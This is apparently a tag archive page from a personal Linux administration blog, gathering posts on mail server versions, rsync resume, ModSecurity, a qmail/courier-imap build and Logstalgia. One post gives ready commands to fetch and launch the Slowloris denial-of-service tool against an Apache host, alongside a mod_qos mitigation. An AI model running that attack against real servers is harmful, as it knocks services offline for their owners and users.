Posts Tagged ‘gz’

How to check version of most used mail servers Postfix / Qmail / Exim / Sendmail

Wednesday, October 14th, 2020

Reading Time: 5 minutes

How to check version of a Linux host's installed Mail server?

The most commonly used mail servers are Postfix / Qmail / Exim / Sendmail, and usually you would run dpkg -l / rpm -qa or query whatever package manager is in use to get the package version. But sometimes the package is built with a naming convention different from the actual installed MTA.

As I recently had to check which exact version of the installed MTA was serving SMTP on a Linux host, below is how to find the concrete versions of Postfix / Qmail / Exim / Sendmail.
If none of the four is installed and something more cryptic like ssmtp is in use instead, perhaps the best way is to check with the lsof -i :25 command and see which process has bound to and is listening on TCP port 25.
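A minimal check along these lines usually does the job (assuming lsof is present; netstat -tlnp serves the same purpose if it is not):

root@server :~# lsof -i :25
root@server :~# netstat -tlnp | grep ':25'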

mail-server-lsof-linux-screenshot-qmail-vpopmail

 

 

1. How to check Postfix exact mail server version

mail-server-exim-check-lsof-screenshot

Once you have found that Postfix is the network-listening MTA, you might think you can simply use postfix -v, but no …
Unlike many other applications, Postfix has no -v or --version switch. You can, however, get the version information easily by using the postconf command as shown below:

root@server :~# postconf mail_version

postfix-show-version-postconf-linux

Another approach is to dump all Postfix configuration settings (useful to get more info on how Postfix is configured) and explicitly grep for the version:

root@server :~# postconf -d | grep mail_version
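The output is a single line with the MTA version; on a Debian 10 host, for example, it will look something like the below (the exact version string will of course differ per system):

mail_version = 3.4.14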

 

2. How to check Exim MTA running version ?

root@exim-mail :/ # exim -bV
Exim version 4.72 #1 built 13-Jul-2010 21:54:55
Copyright (c) University of Cambridge, 1995 – 2007
Berkeley DB: Sleepycat Software: Berkeley DB 4.3.29: (September 19, 2009)
Support for: crypteq iconv() Perl OpenSSL move_frozen_messages Content_Scanning DKIM Old_Demime
Lookups: lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmnz
Authenticators: cram_md5 plaintext spa
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore/mbx autoreply lmtp pipe smtp
Size of off_t: 8
OpenSSL compile-time version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
OpenSSL runtime version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
Configuration file is /etc/exim.conf

how-to-get-exim-version-on-gnu-linux-screenshot


3. How to check Sendmail Mail Transport Agent exact Mail version ?

Though Sendmail is rarely used these days and mostly survives on obsolete old scrap hosts
or in some old-fashioned conservative organizations such as banks and payment service providers, you might still need to inventory it. Just like its m4 configuration format complexity with the annoying macros, getting the version is also not straightforward:

# sendmail -d0.4 -bv root | grep Version
Version 8.14.4

The above commands should work on most Linux distributions such as Debian / Ubuntu / Fedora / CentOS / SuSE and other Linux derivatives.
 

4. How to check Qmail MTA version?

This is a bit of a complicated question, as Qmail's code base has not changed significantly for years.
The latest published qmail package is qmail-1.03.tar.gz, and 1.03 was released back in 1998. Qmail is famous for its unbreakable security. Its author, Daniel J. Bernstein, is famous for writing Qmail to make the installation and configuration of SMTP simple; at the time of its writing Sendmail was the de facto standard, and Sendmail was hard to configure.
Sendmail was also famous for a set of security holes that got a lot of Sendmail MTAs on the Net hacked. Thus Qmail was written as a more security-aware mail transport agent.

In contrast to sendmail, qmail has a modular architecture composed of mutually untrusting components; for instance, the SMTP listener component of qmail runs with different credentials from the queue manager or the SMTP sender. qmail was also implemented with a security-aware replacement to the C standard library, and as a result has not been vulnerable to stack and heap overflows, format string attacks, or temporary file race conditions.

The core qmail package has not been updated for many years. New features were initially provided by third party patches, from which the most important at the time were brought together in a single meta-patch set called netqmail.

As of 2020, the current version of netqmail is 1.06 (netqmail-1.06.tar.gz).

One possible way to get some info about the installed qmail and its components is to use the documentation lookup command apropos:

qmail:~# apropos qmail
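On a typical install the output looks along these lines (trimmed here; the exact entries depend on which qmail components and man pages are present):

qmail-inject (8)     - preprocess and send a mail message
qmail-queue (8)      - queue a mail message for delivery
qmail-send (8)       - deliver mail messages from the queue
qmail-smtpd (8)      - receive mail via SMTP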


or check the manual, or at worst look for the installation source files used by the person who installed the qmail 🙂

A fun fact about qmail few might know: in 1997 D. J. Bernstein offered a US$500 reward for the first person to publish a verifiable security hole in the latest version of the software. No hole was found for many years, until in 2005 security researcher Georgi Guninski found an integer overflow in qmail. On 64-bit platforms, in default configurations with sufficient virtual memory, the delivery of huge amounts of data to certain qmail components may allow remote code execution. Bernstein disputes that this is a practical attack, arguing that no real-world deployment of qmail would be susceptible. Configuring resource limits for qmail components mitigates the vulnerability.

On November 1, 2007, Bernstein raised the reward to US$1000. At a slide presentation the following day, Bernstein stated that there were 4 "known bugs" in the ten-year-old qmail-1.03, none of which were "security holes." He characterized the bug found by Guninski as a "potential overflow of an unchecked counter." "Fortunately, counter growth was limited by memory and thus by configuration, but this was pure luck."

5. Quick way to check the type of Mail server installed on Debian based Linux that doesn't have telnet installed


As you know, a simple telnet localhost 25 or a simple ps -ef can in most cases reveal general information on the installed mail server. However, there is another way to do it via the package manager, using the bash built-in type command like so:
 

# type -p sendmail | xargs dpkg -S

type-x-bash-command-to-find-out-email-server-version-on-linux

Another hacky way to check whether exim, postfix or sendmail SMTP is installed is with:

hipo@freak:~$ echo $(man sendmail)| grep "exim"|wc -l
1
hipo@freak:~$ echo $(man sendmail)| grep "postfix"|wc -l
0
hipo@freak:~$ echo $(man sendmail)| grep "sendmail"|wc -l
0
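If netcat happens to be present on the host (an assumption, nc is not always installed either), yet another quick hack is to read the SMTP greeting banner, which usually names the MTA; for a Postfix host the 220 line would look something like:

hipo@freak:~$ echo QUIT | nc -w 3 localhost 25
220 freak.example.com ESMTP Postfix (Debian/GNU)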

I guess there are nice hacks and ways to get versions, so if you're aware of any please share with me.
Enjoy !

Apache Denial of Service (DoS) attack with Slowloris / Crashing Apache

Monday, February 1st, 2010

Reading Time: < 1 minute

slowloris-denial-of-service-apache-logo
A friend of mine pointed me to a nice tool that is able to create a successful denial of service against most of the web servers running out there. The tool is called Slowloris.
For any further information there is the following publication on ha.ckers.org about Slowloris.
The original article by my friend is located on his personal blog (mpetrov.net).
Unfortunately the post is in Bulgarian, so it's not a match for an English-speaking audience.
To launch the attack on Debian Linux all you need is:

# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
Now issue the attack:
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

There you go: the Apache server is not responding, no traces of the DoS are left on the server,
and the log file is completely clear of records!
The fix for the attack comes with installing the not so popular Apache module mod_qos:
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.c
The module installs into "/usr/lib/apache2/modules". All that is left is configuring the module:
# cd /etc/apache2/mods-available/
# vim qos.load

Add the following in the file:

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
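Creating a matching qos.conf next to it with some connection limits is what actually mitigates Slowloris-style attacks; the directives below are a commonly cited example and the values are only assumptions to be tuned to your own traffic:

# vim /etc/apache2/mods-available/qos.conf

<IfModule qos_module>
# keep track of up to 100000 client IP addresses
QS_ClientEntries 100000
# allow at most 50 simultaneous connections per client IP
QS_SrvMaxConnPerIP 50
# disable keep-alive once 180 connections are open
QS_SrvMaxConnClose 180
# drop clients sending / reading data slower than 150 bytes/sec
QS_SrvMinDataRate 150 1200
</IfModule>

Then enable the module and restart Apache, e.g. with a2enmod qos && /etc/init.d/apache2 restart (a2enmod is the standard Debian helper; the qos.load created above makes the module available to it).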

Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.

Resume sftp / scp cancelled (interrupted) network transfer – Continue (large) partially downloaded files on Linux / Windows

Thursday, April 23rd, 2015

Reading Time: 3 minutes

resume-sftp-scp-cancelled-interrupted-file-transfer-download-upload-network-transfer-continue-large-partially-downloaded-file-howto-linux-windows
I recently had a task to transfer some huge, long-stored Application server data (about 70GB), after archiving it, from an old Linux host to a new one, where a new Tomcat Application (Linux) server will be installed to cope with the increased site accessibility (the old server hardware was overloaded).

The two systems sit in a paranoid DMZ network and have no access to each other via SSH / FTP / FTPS, and not even web access on port 80 or SSL 443 between the two hosts, so in order to move the data I had to use a third HOP station, a Windows server which has a huge SAN network attached storage of 150 TB (as a mapped drive I:/).

On the Windows HOP station, which gives me access to the DMZ-ed network via Citrix Receiver, I'm using MobaXterm, so the basic UNIX commands such as sftp / scp are already available on the Windows system through it.
Thus, to transfer the archived .tar.gz files of the Chronos Tomcat application, I sftp-ed into the Linux host and used the get command to retrieve them, e.g.:

 

sftp UserName@Linux-server.net
Password:
Connected to Linux-server.
sftp> get Chronos_Application_23_04_2015.tar.gz

….


The secured DMZ network seemed to have a network shaper limiting my get / secured SCP download to about 2.5 MBytes/sec, thus the overall file transfer seemed to require a lot of time, about 08:30 hours, to complete. As it was the middle of the day, about 13:00, and my work day ends at 18:00, I could keep the file retrieval session open for a maximum of 5 hours, and the transfer would be cancelled when I logged out of the HOP station (after 18:00). I had already left the file transfer running for 2 hours, so about 23% of the file was retrieved, and I wondered whether SCP / SFTP protocol file downloads could be resumed. I checked thoroughly all the options within sftp (the interactive SCP client) and the scp command manual itself, however neither of them has a resume option.

Then I thought for a while about what I could use to continue the interrupted download, and I remembered that good old rsync (a versatile remote and local file copying tool), which I often use when creating customer backup strategies, has the ability to resume partially downloaded files. I wondered whether this partial-download resume works only if the file transfer was initiated through rsync itself, but luckily rsync is able to continue interrupted file transfers no matter what kind of HTTP / HTTPS / SCP / FTP program was used to start the file retrieval (rsync can continue transfers cancelled / failed due to network problems or user interaction). That turned out to be pretty easy: to continue the failed file download from where it was interrupted I had to change to the directory where the file is located:
 

cd /path/to/interrupted_file/


and issue command:
 

rsync -av --partial username@Linux-server.net:/path/to/file .


The --partial option is the one that does the file resume trick; the -a option stands for --archive and turns on archive mode (equal to the -rlptgoD arguments, i.e. no -H, -A, -X), and the -v option makes the transfer verbose. An easier to remember rsync resume uses -P, which combines --partial with --progress and also shows a file transfer percentage status line and an estimated time for the transfer to complete, like so:
 

rsync -avP username@Linux-server.net:/path/to/file .
Password:
receiving incremental file list
chronos_application_23_04_2015.tar.gz
  4364009472   8%    2.41MB/s    5:37:34

To continue a failed file upload with rsync (e.g. if you used the sftp put command and the upload failed or was cancelled):
 

rsync -avP chronos_application_23_04_2015.tar.gz username@Linux-server.net:/path/where_to/upload


Of course, for the rsync resume to work the remote Linux system must have the rsync package installed; if rsync is not available on the remote system this will not work, so before using this method make sure the remote Linux / Windows server has rsync installed. There is also an rsync port for Windows, so to easily resume large gigabyte or terabyte archive downloads between two Windows hosts use cwRsync.

Tightening PHP Security on Apache 2.2 with ModSecurity2 on Debian Lenny Linux

Monday, April 26th, 2010

Reading Time: 4 minutes

Tightening-PHP-Security-on-Apache-2.2-2.4-with-Apache-ModSecurity2
In this article you'll learn how I easily installed and configured ModSecurity 2 on a Debian Lenny system.
First let me give you a few introductory words about ModSecurity: what it is and why it's a good idea to install and use it on your Apache webserver.

ModSecurity is an Apache module that provides intrusion detection and prevention for web applications. It aims at shielding web applications from known and unknown attacks, such as SQL injection attacks, cross-site scripting, path traversal attacks, etc.

As you can see from ModSecurity's description, it's a priceless add-on module for Apache that is able to protect your PHP applications and Apache server from a huge number of hacker attacks undertaken against your online web application or webserver.
The only thing I don't like about this module is that it is actually a 3rd party module (i.e. not officially part of Apache). I remember that some time ago there was even an exploit for one of the versions of the module.
So in some cases the ModSecurity could also pose a security risk, so beware!
However, if you know what you're doing and keep regular track of security news on some major security websites, that shouldn't be a concern for you.
Now let's proceed to the install of the ModSecurity module itself.
The install is a piece of cake on Debian, though you'll be required to use the Debian Lenny backports.

Here is the install of the module step by step:

1. First add the gpg key of the backports repository to your install

debian-server:~# gpg --keyserver pgp.mit.edu --recv-keys C514AF8E4BA401C3
# another possible way to add the repository as the website describes is through the command
debian-server:~# wget -O - http://backports.org/debian/archive.key | apt-key add -
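If the Lenny backports repository is not yet present in your /etc/apt/sources.list, you will also have to add a line along the following (the mirror URL is an assumption based on the standard backports.org path of the time and may differ for your setup), followed by an apt-get update:

debian-server:~# echo "deb http://www.backports.org/debian lenny-backports main contrib non-free" >> /etc/apt/sources.list
debian-server:~# apt-get update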

2. Install the libapache-mod-security package from the backports Debian Lenny repository

debian-server~:~# apt-get -t lenny-backports install libapache2-mod-security2

Now, as the last step of the ModSecurity install procedure, you have to add some configuration directives to Apache and restart the server afterwards.

– Open your /etc/apache2/apache2.conf and place the following configuration in it:


<IfModule mod_security2.c>
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off

# Debug log
SecDebugLog /var/log/apache2/modsec_debug.log
SecDebugLogLevel 0

# Serial audit log
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus ^5
SecAuditLogParts ABIFHZ
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log

# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072

# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072

# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288
</IfModule>

With that, the ModSecurity2 module would be properly installed and configured as an Apache module.
3. All that is left is to restart Apache in order for the new module and configuration to take effect.

debian-server:~# /etc/init.d/apache2 restart

Don't forget to check the Apache config file for errors before restarting Apache with the above command; to do so, issue the command:
debian-server:~# apache2ctl -t

If all is fine you should get as an output:

Syntax OK

4. Next, to find out whether the Apache ModSecurity2 module is enabled and already used by Apache as a means of protection,
you might want to check if the log files modsec_audit.log and modsec_debug.log have grown and are being fed new content.
If they're growing and you see messages concerning the operation of the ModSecurity2 Apache module, that's a sure sign all is fine.
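A quick way to keep an eye on both of them (assuming the log paths configured above) is:

debian-server:~# tail -f /var/log/apache2/modsec_audit.log /var/log/apache2/modsec_debug.log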
5. Now that we have the ModSecurity Apache module configured on our Debian server, we will need to apply some ModSecurity Core Rules.
In short, the ModSecurity Core Rules are a set of critical protection rules against attacks across almost every web architecture.
Another really neat thing about the Core Rules (CRS) for ModSecurity is that they are written with performance in mind,
so enabling these filter rules won't be too heavy a load for your Apache server.

Here is how to install the core rules:

6. Download the latest ModSecurity Core Rules

Download them from the following Core Rules URL.
At the time of writing this article the latest Core Rules are version modsecurity-crs_2.0.6.tar.gz.

To download and install these rules issue commands like:

debian-server:~# wget http://sourceforge.net/projects/mod-security/files/modsecurity-crs/0-CURRENT/modsecurity-crs_2.0.6.tar.gz/download
debian-server:~# cp -rpf ~/modsecurity-crs_2.0.6.tar.gz /etc/apache2/
debian-server:~# cd /etc/apache2/; tar -zxvvf modsecurity-crs_2.0.6.tar.gz

Besides physically storing the unarchived modsecurity-crs in your /etc/apache2, it is also necessary to add the following two lines to your Apache IfModule mod_security2.c block of code:

Include /etc/apache2/modsecurity-crs_2.0.6/*.conf
Include /etc/apache2/modsecurity-crs_2.0.6/base_rules/*.conf

Thus ultimately the configuration concerning ModSecurity in your Apache Server configuration should look like the following:

<IfModule mod_security2.c>
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off

# Debug log
SecDebugLog /var/log/apache2/modsec_debug.log
SecDebugLogLevel 0

# Serial audit log
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus ^5
SecAuditLogParts ABIFHZ
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log

# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072

# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072

# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288
Include /etc/apache2/modsecurity-crs_2.0.6/*.conf
Include /etc/apache2/modsecurity-crs_2.0.6/base_rules/*.conf
</IfModule>

Once again you have to check if everything is fine with Apache configurations with:

debian-server:~# apache2ctl -t

If it shows an OK status once again, then you're ready to restart the webserver.
debian-server:~# /etc/init.d/apache2 restart

One example of the goodness of setting up ModSecurity + the Core Rule Set, once the above described installation is fully functional:

ModSecurity will be able to track if somebody tries to execute a PHP shell on your server.
ModSecurity will catch, log and block (forbid) requests to r99.txt, r59, safe0ver and possibly other hacked modifications of the PHP shell script.

That’s it! Now Enjoy your tightened Apache Security and Hopefully catch the script kiddie trying to h4x0r yoU 🙂

Make QMAIL with vpopmail vchkpw, courier-authlib and courier-imap auth work without MySQL on Debian Linux qmailrocks Thibs install

Friday, September 28th, 2012

Reading Time: 5 minutes

How to make qmail, vpopmail, vchkpw, courier-authlib and courier-imap work storing mails on the hard disk with the qmailrocks Thibs install

I recently installed a new QMAIL, mostly following Thibs' Qmailrocks install guide. I didn't follow Thibs' good guide literally, because in a few of its sections, like Install Vpopmail, he recommends using MySQL as a backend to store the Vpopmail email data and passwords; I prefer storing all vpopmail data on the file system, as I believe it is much better, especially for tiny QMAIL mail servers with fewer than 500 mailbox accounts.

In this little article I will explain how I made Vpopmail, courier-authlib and courier-imap play nicely together without storing data in an SQL backend.

1. Compile vpopmail with file system data storage support

So here is how I managed to make vpopmail + courier-authlib + courier-imap, work well together:

First it's necessary to compile Vpopmail to store all its user data and mail data on the file system. For this, in Thibs' Vpopmail install step I compiled Vpopmail without support for MySQL, i.e. instead of using the compile-time ./configure arguments he points to, I used:


# cd /downloads/vpopmail-5.4.33
# ./configure \
--enable-qmaildir=/var/qmail/ \
--enable-qmail-newu=/var/qmail/bin/qmail-newu \
--enable-qmail-inject=/var/qmail/bin/qmail-inject \
--enable-qmail-newmrh=/var/qmail/bin/qmail-newmrh \
--enable-tcprules-prog=/usr/bin/tcprules \
--enable-tcpserver-file=/etc/tcp.smtp \
--enable-clear-passwd \
--enable-many-domains \
--enable-qmail-ext \
--enable-logging=y \
--enable-auth-logging \
--enable-libdir=/usr/lib/ \
--disable-roaming-users \
--disable-passwd \
--enable-domainquotas \
--enable-roaming-users
....
....
# make && make install-strip
# cat > ~vpopmail/etc/vusagec.conf << __EOF__
Server:
Disable = True;
__EOF__
echo 'export PATH=$PATH:/var/qmail/bin/:/home/vpopmail/bin/' > /etc/profile.d/extrapath.sh
chmod +x /etc/profile.d/extrapath.sh
source /etc/profile

A tiny shell script with all above options to compile (qmail) vpopmail without MySQL / PostgreSQL support is here

For the other steps concerning creation of the vpopmail/vchkpw user and group, just follow what Thibs suggests.

2. Compile and install courier-authlib-0.59.1

I've made a mirror of courier-authlib.0.59.1.tar.gz because this version includes support for vchkpw without MySQL; it's a pity newer versions of courier-authlib no longer support vpopmail storing its data directly on the hard disk.

Then download, compile && install courier-authlib:

Download courier-authlib.0.59.1.tar.gz (I made a mirror of courier-authlib.0.59.1.tar.gz; you can use my mirror or download it from somewhere else on the net):


# cd /usr/local/src
# wget -q https://pc-freak.net/files/courier-authlib.0.59.1.tar.gz
# tar -zxvvf courier-authlib.0.59.1.tar.gz

Compile courier-authlib

# ./configure --prefix=/usr/local --exec-prefix=/usr/local --with-authvchkpw --without-authldap --without-authmysql --disable-root-check --with-ssl --with-authchangepwdir=/usr/local/libexec/authlib
....
# make && make install && make install-strip && make install-configure
....

On Debian Squeeze this version of courier-authlib compiles fine; I use it on Debian Lenny too and there it is okay as well.

Unless the above commands return a compile error, authlib will be installed inside /usr/local/libexec. If you get any errors, it is most likely due to some missing header files. The error should be self-explanatory enough, but just in case you have trouble finding which deb is necessary to install, please check here the complete list of installed packages I have on the host. In case of problems the quickest way (if on Debian Squeeze) is to install the same packages; type:


# wget -q https://pc-freak.net/files/list_of_all_deb_necessery_installed_packages_for_authlib.txt
# for i in $(cat list_of_all_deb_necessery_installed_packages_for_authlib.txt |awk '{ print $2 }'); do
apt-get install --yes $i;
done

This is for the lazy ones, though it might install some packages you don't want to have on your host, so only do it if you know what you're doing 🙂
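If you would rather pull in only the obvious build dependencies by hand, something along these lines usually covers a from-source courier-authlib build with the --with-ssl flag used above (the package names are the usual Debian ones and are an assumption, adjust to your release):

# apt-get install build-essential libssl-dev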

Next step is to set proper configuration for courier-authdaemon.

3. Configure courier-authlib in /usr/local/etc/authlib

Again for the lazy ones, I have prepared a good config which works 100% with vpopmail configured to store mails on the file system. To install the "good" configs, fetch mine and put them in the proper location, e.g.:


# cd /usr/local/etc
# wget -q https://pc-freak.net/files/authlib-config-for-qmail-with-hdd-directory-stored-userdata.tar.gz
# tar -zxvvf authlib-config-for-qmail-with-hdd-directory-stored-userdata.tar.gz
....

For those who prefer not to use my configuration as pointed above, here is what you will need to change manually in configs:

Edit /usr/local/etc/authlib/authdaemonrc and make sure the variables authmodulelist, authmodulelistorig and daemons
are set as follows:


authmodulelist="authvchkpw"


authmodulelistorig="authuserdb authpgsql authldap authmysql authcustom authvchkpw authpipe"


daemons=10

Bear in mind that the daemons setting determines the maximum number of parallel connections possible to authdaemond for new IMAP mail-fetch user requests. Setting it to 10 will allow your mail server to support up to 10 users checking their mail in parallel; for a tiny mail server this setting is okay, but if you expect a higher number of parallel mail users, raise it to a value fitting your needs.

P.S. On some qmail installations this value has created weird problems, and it took me hours to debug that the whole mess was caused by this setting; make sure you plan it now unless you want to lose some time in the future.

4. Stop debian courier-authdaemon and start custom compiled one

Now all is ready and authdaemond can be started, but before that, if you have installed courier-authlib as a Debian package, you need to stop it via its init script, and only when you are completely sure the old default Debian courier-authdaemon is stopped, launch the newly installed one:


# /etc/init.d/courier-authdaemon stop
# ps ax |grep -i authdaemond |grep -v grep
#
# /usr/local/sbin/authdaemond start
#

To make the newly custom source-installed courier-authdaemon load itself on system boot instead of the Debian installed package:


# dpkg -l |grep -i courier-authdaemon
ii courier-authdaemon 0.63.0-3 Courier authentication daemon

open /etc/init.d/courier-authdaemon, and after the line:


. /lib/lsb/init-functions

add


/usr/local/sbin/authdaemond start
exit 0

This will make the script exit right after it launches the command /usr/local/sbin/authdaemond start.

5. Compile and Install courier-imap

You will also have to install courier-imap from an archive source. I have tested it and know Qmail + Vpopmail + Courier-IMAP works for sure with version courier-imap-4.1.2.tar.bz2.

As of the time of writing this post, courier-imap-4.11.0.tar.bz2 is the latest available for download from the Courier-IMAP download site; unfortunately this version requires a higher courier-authlib version, >= courier-authlib-0.63.

In order to install courier-imap-4.1.2.tar.bz2:


# cd /usr/local/src
# wget -q https://pc-freak.net/files/courier-imap-4.1.2.tar.bz2
# tar -jxvvf courier-imap-4.1.2.tar.bz2
...
# chown -R hipo:hipo courier-imap-4.1.2
# su hipo
$ cd courier-imap-4.1.2/
$ export CFLAGS="-DHAVE_OPEN_SMTP_RELAY -DHAVE_VLOGAUTH"
$ export COURIERAUTHCONFIG=/usr/local/bin/courierauthconfig
$ export CPPFLAGS=-I/usr/local/courier-authlib/include
$ ./configure --prefix=/usr/local/courier-imap --disable-root-check
...
$ exit
# make
...
# make install
...
# make install-configure

It is recommended to compile courier-imap as a non-root user. In the above code I use my username hipo; other people should use any non-root user of their own.

6. Set proper configuration and new init script for courier-imap

In /usr/lib/courier-imap, download the following working configs (for convenience I've made a tar with my configs) and unpack them:


# cd /usr/lib/courier-imap
# rm -rf etc
# wget -q https://pc-freak.net/files/courier-imap-config-etc.tar.gz
# tar -zxvf courier-imap-config-etc.tar.gz

Then you will have to overwrite the default courier-imap init script in /etc/init.d/courier-imap with another one that starts the custom compiled courier-imap instead of the Debian default installed one:


# mv /etc/init.d/courier-imap /root
# cd /etc/init.d
# wget -q https://pc-freak.net/files/debian-courier-imap
# mv debian-courier-imap courier-imap
# chmod +x courier-imap

This init script is written to use /var/lock/subsys/courier-imap, so you will also have to create /var/lock/subsys/:


# mkdir -p /var/lock/subsys

7. Start custom installed courier-imap

The start/stop init script of newly installed courier-imap is /usr/lib/courier-imap/libexec/imapd.rc


/usr/lib/courier-imap/libexec/imapd.rc start

Since a new /etc/init.d/courier-imap is installed too, it can also be used to control courier-imap start/stop.

Well, that should be enough for Courier-IMAP and Courier-Authlib to communicate fine with each other and be able to connect to and fetch the e-mail stored on the file system by vpopmail.

8. Test if Qmail IMAP proto finally works


# telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE AUTH=CRAM-MD5 ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2011 Double Precision, Inc. See COPYING for distribution information.
a login username@mail-domain.com my-username-password
a OK LOGIN Ok.
a LIST "" "*"
* LIST (\HasNoChildren) "." "INBOX.Sent"
* LIST (\Marked \HasChildren) "." "INBOX"
* LIST (\HasNoChildren) "." "INBOX.Drafts"
* LIST (\HasNoChildren) "." "INBOX.Trash"
a OK LIST completed
a EXAMINE Inbox
* FLAGS (\Draft \Answered \Flagged \Deleted \Seen \Recent)
* OK [PERMANENTFLAGS ()] No permanent flags permitted
* 6683 EXISTS
* 471 RECENT
* OK [UIDVALIDITY 1272460837] Ok
* OK [MYRIGHTS "acdilrsw"] ACL
a OK [READ-ONLY] Ok
* 1 FETCH (BODY[] {2619}
Return-Path:
Delivered-To: hipo@my-domain-name.com
Received: (qmail 22304 invoked by uid 1048); 24 Apr 2012 14:49:49 -0000
Received: from unknown (HELO localhost) (127.0.0.1)
by mail.my-domain-name.com with SMTP; 24 Apr 2012 14:49:49 -0000
Delivered-To: hipo@my-domain-name.com
Received: from localhost [127.0.0.1]
......
......

That's all, it works. Enjoy 🙂

Linux: List last 10 (newest) and 10 oldest modified files in a directory with ls

Tuesday, April 8th, 2014

Reading Time: < 1 minute

A useful thing on GNU / Linux is sometimes to list the most recently or the oldest modified files in a directory.

Let's say you want to list the last 10 modified files with ls, from today / yesterday. Here is how:
 

ls -1t | head -10
my.cnf
wordperss_enabled_plugins.txt
newcerts/
mysql-hipo_pcfreakbiz.dump
NewArchive-Jan-10-15.zip
hipo_pcfreakbiz-mysqldb-any-out-1389361234.tgz
Tisho_Snimki/
wordpress/
wp-cron.php?doing_wp_cron=1.1
wp-cron.php

 

To list 10 oldest modified files on Linux:

 

ls -1t | tail -10
    my.cnf
    pcfreak_sql-15_10_05_2012
    mysql-tuning-primer*
    tuning-primer.sh*
    system-administration-services.html
    blog_backup_15_07_2012.tar.gz
    www-files/
    dump.sql
    courier-imap*
    djbdns-1.05.tar.gz
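If you also want to see the modification timestamps next to the file names, a long listing works the same way; head -11 is used here only because ls -l prints a leading total line:

ls -lt | head -11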


Cheers 😉

Fun with Apache / Nginx Webserver log – Visualize webserver access log in real time

Friday, July 18th, 2014

Reading Time: 4 minutes

visualize-graphically-web-server-access-log-logstalgia-nginx-apache-log-visualize-in-gnu-linux-and-windows
If you're working in a hosting company and looking for a graphical way to visualize access to your Linux webservers (Apache, Nginx, Lighttpd), you will be happy to learn about Logstalgia's existence. Logstalgia is very useful if you need to convince your boss / company clients that the webservers are exceeding the CPU / memory hardware limits the physical servers can handle. Even if you don't have to convince anyone of anything, Logstalgia is cool to run if you want to impress a friend and show off your 1337 4Dm!N Sk!11Z 🙂 Logstalgia is a much more pleasant way to keep an eye on your webserver log files in real time than tail -f.

The graphical output of Logstalgia is a pong-like battle game between the webserver and a never-ending chain of web requests.

This is the official website description of Logstalgia:
 

Logstalgia is a website traffic visualization that replays web-server access logs as a pong-like battle between the web server and an never ending torrent of requests. Requests appear as colored balls (the same color as the host) which travel across the screen to arrive at the requested location. Successful requests are hit by the paddle while unsuccessful ones (eg 404 – File Not Found) are missed and pass through. The paths of requests are summarized within the available space by identifying common path prefixes. Related paths are grouped together under headings. For instance, by default paths ending in png, gif or jpg are grouped under the heading Images. Paths that don’t match any of the specified groups are lumped together under a Miscellaneous section.


To install Logstalgia on Debian / Ubuntu Linux there is a native package, so to install it run the usual:

apt-get --yes install logstalgia

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  logstalgia
0 upgraded, 1 newly installed, 0 to remove and 4 not upgraded.
Need to get 161 kB of archives.
After this operation, 1,102 kB of additional disk space will be used.
Get:1 http://mirrors.kernel.org/debian/ stable/main logstalgia amd64 1.0.0-1+b1 [161 kB]
Fetched 161 kB in 2s (73.9 kB/s)
Selecting previously deselected package logstalgia.
(Reading database ... 338532 files and directories currently installed.)
Unpacking logstalgia (from .../logstalgia_1.0.0-1+b1_amd64.deb) ...
Processing triggers for man-db ...
Setting up logstalgia (1.0.0-1+b1) ...


Logstalgia is easily installable from source code on non-Debian Linux distributions too; to install it on any non-Debian Linux distribution do:

cd /usr/local/src/
wget https://logstalgia.googlecode.com/files/logstalgia-1.0.5.tar.gz
 

–2014-07-18 13:53:23–  https://logstalgia.googlecode.com/files/logstalgia-1.0.3.tar.gz
Resolving logstalgia.googlecode.com… 74.125.206.82, 2a00:1450:400c:c04::52
Connecting to logstalgia.googlecode.com|74.125.206.82|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 841822 (822K) [application/x-gzip]
Saving to: `logstalgia-1.0.3.tar.gz'

100%[=================================>] 841,822     1.25M/s   in 0.6s

2014-07-18 13:53:24 (1.25 MB/s) – `logstalgia-1.0.3.tar.gz' saved [841822/841822]

Untar the archive with:
 

tar -zxvf logstalgia-1.0.5.tar.gz

Compile and install it:

cd logstalgia
./configure
make
make install

 

How to use LogStalgia?

Syntax is pretty straightforward: just pass the Nginx / Apache access log file as an argument.

Process Debian Linux Apache logs:

logstalgia /var/log/apache2/access.log


Process CentoS, Redhat etc. RPM based logs:

logstalgia /var/log/httpd/access.log
To process webserver log in real time with logstalgia:

tail -f /var/log/httpd/access_log | logstalgia -

